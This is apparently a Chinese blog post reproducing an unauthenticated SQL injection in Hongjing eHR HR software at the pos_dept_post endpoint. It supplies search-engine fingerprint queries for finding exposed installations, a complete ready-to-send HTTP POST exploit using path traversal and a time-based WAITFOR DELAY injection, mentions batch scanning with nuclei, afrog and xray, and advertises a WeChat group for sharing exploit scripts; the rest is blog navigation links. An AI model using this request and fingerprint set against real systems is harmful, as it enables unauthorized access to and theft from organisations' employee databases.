【漏洞复现】宏景eHR pos_dept_post SQL注入漏洞

0x01 产品简介

宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。

0x02 漏洞概述

宏景eHR pos_dept_post 接囗处存在SQL注入漏洞,未经过身份认证的远程攻击者利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。

0x03 搜索引擎

body="<div class=\"hj-hy-all-one-logo\"" || title="人力资源信息管理系统" || body="/general/sys/hjaxmanage.js"

在这里插入图片描述

0x04 漏洞复现

POST /templates/attestation/../../pos/roleinfo/pos_dept_post HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
x-auth-token: d9eaeacd5de1008fd43f737c853dcbcb
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
usertable=h00&i9999=1';WAITFOR DELAY '0:0:5'--+

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

相关推荐

  1. 漏洞】NotificationX SQL注入漏洞(CVE-2024-1698)

    2024-06-11 03:42:03       45 阅读

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-06-11 03:42:03       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-06-11 03:42:03       101 阅读
  3. 在Django里面运行非项目文件

    2024-06-11 03:42:03       82 阅读
  4. Python语言-面向对象

    2024-06-11 03:42:03       92 阅读

热门阅读

  1. Centos7.9部署单节点K8S环境

    2024-06-11 03:42:03       28 阅读
  2. leetcode 40. 组合总和 II

    2024-06-11 03:42:03       46 阅读
  3. Cordova WebView重定向到网站

    2024-06-11 03:42:03       46 阅读
  4. 重写setter方法要小心递归调用

    2024-06-11 03:42:03       22 阅读
  5. 代码随想录打卡第一天(补)

    2024-06-11 03:42:03       31 阅读
  6. web3规则改变者:Linea的厉害之处

    2024-06-11 03:42:03       33 阅读
  7. 什么是 prop drilling,如何避免?

    2024-06-11 03:42:03       26 阅读
  8. 【CSP】202312-1 仓库规划

    2024-06-11 03:42:03       43 阅读
  9. testbench仿真文件编写规则

    2024-06-11 03:42:03       40 阅读
  10. 头歌初识redis答案

    2024-06-11 03:42:03       35 阅读
  11. 机器人--矩阵运算

    2024-06-11 03:42:03       30 阅读